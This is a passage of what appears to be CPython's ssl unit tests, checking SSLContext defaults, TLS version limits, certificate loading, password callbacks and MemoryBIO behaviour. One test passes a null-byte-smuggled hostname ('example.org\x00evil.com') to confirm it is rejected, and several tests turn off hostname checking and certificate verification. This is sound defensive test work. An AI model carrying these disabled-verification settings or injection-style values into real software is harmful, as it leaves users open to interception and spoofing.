ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
